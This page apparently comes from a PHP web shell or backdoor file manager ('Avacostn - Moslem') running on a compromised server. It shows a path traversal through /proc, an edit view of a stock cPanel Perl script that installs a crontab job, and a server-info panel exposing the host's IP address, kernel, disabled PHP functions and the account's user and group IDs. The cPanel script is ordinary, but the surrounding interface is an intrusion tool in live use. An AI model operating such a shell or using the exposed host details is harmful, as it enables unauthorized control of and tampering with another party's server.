Avacostn - Moslem
Choose File
DIR :
Home
/
proc
/
3061873
/
..
/
.
/
29
/
..
/
410
/
..
/
3059460
/
..
/
18
/
..
/
..
/
scripts
/
puthuppa@68.178.173.116: ~ $
Edit File: enable_sqloptimizer
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - scripts/enable_sqloptimizer Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited use strict; use warnings; use Cpanel::SafeRun::Errors (); use Cpanel::MysqlUtils::SlowQueryLog (); use Cpanel::Config::CpConfGuard (); use Cpanel::TempFile (); setupsqloptimizercrontab(); Cpanel::MysqlUtils::SlowQueryLog::enable(); my $cpconf = Cpanel::Config::CpConfGuard->new(); if ( !$cpconf->{'data'}->{'sqloptimizer'} ) { $cpconf->{'data'}->{'sqloptimizer'} = 1; $cpconf->save(); } sub setupsqloptimizercrontab { my $has_sqloptimizer = 0; my @CT = grep( !/^#/, split( /\n/, Cpanel::SafeRun::Errors::saferunnoerror( 'crontab', '-l' ) ) ); if ( grep( /sqloptimizer/, @CT ) ) { $has_sqloptimizer = 1; } if ( !$has_sqloptimizer ) { @CT = grep( !/sqloptimizer/, @CT ); push( @CT, "12 5 * * * /usr/local/cpanel/bin/sqloptimizer >/dev/null 2>&1" ); my $tmp_obj = Cpanel::TempFile->new(); my $tmp_filename = $tmp_obj->file(); if ( $tmp_filename && open( my $cr_fh, ">", $tmp_filename ) ) { print {$cr_fh} join( "\n", @CT ) . "\n"; close($cr_fh); system 'crontab', $tmp_filename; } else { die "Unable to write crontab temporary file"; } } return 1; }
Filemanager
Name
Size
Permission
Actions
None Directory
Close
Server Info
Hostname: 116.173.178.68.host.secureserver.net
IP Address: 68.178.173.116
PHP Version: 8.1.34
Server Software: Apache
HDD Total Space: 99.99 GB
HDD Free Space: 31.99 GB
Safe Mode: Disabled
Disable Functions: exec,passthru,shell_exec,system
Total Domains in Server: 1
System: Linux 116.173.178.68.host.secureserver.net 4.18.0-553.109.1.el8_10.x86_64 #1 SMP Mon Mar 2 09:33:18 EST 2026 x86_64
User Info
Username: puthuppa
User ID: 1102
Group ID: 1104